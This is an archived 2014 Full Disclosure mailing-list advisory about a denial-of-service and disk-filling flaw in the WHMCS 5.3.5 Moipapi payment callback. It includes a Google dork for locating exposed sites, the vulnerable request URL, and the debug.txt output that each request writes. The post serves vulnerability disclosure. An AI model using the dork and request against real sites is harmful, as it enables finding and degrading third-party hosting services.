Full Disclosure mailing list archives
WHMCS Moipapi DoS & Memory Consumption Vulnerability 5.3.5
From: surivaton surivaton <surivaton () gmail com>
Date: Wed, 20 Aug 2014 09:48:27 +1000
WHMCS has been notified. # Exploit Title: WHMCS Moipapi DoS & Memory Consumption Vulnerability 5.3.5 # Google Dork: inurl:/modules/gateways/callback/moipapi.php -intext:"Gateway Module "moipapi" Not Activated" # Date: 23/7/2014 # Exploit Author: surivaton # Vendor Homepage: whmcs.com # Version: 5.3.5 # Tested on: Linux, Windows Possible denial of service with memory consumption and taking up disc space URL: www.whmcshostedsite.com/modules/gateways/callback/moipapi.php?x= Enter what ever you want after x= Writes to debug.txt in same directory: www.whmcshostedsite.com/modules/gateways/callback/debug.txt What appears in debug.txt(a tad over 200 bytes): ----------------------------------- POST received: Array ( ) ----------------------------------- Return MoIP data Invoice: Date: 22/07/2014 09:36:53 Status [] Started payment. _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- WHMCS Moipapi DoS & Memory Consumption Vulnerability 5.3.5 surivaton surivaton (Aug 20)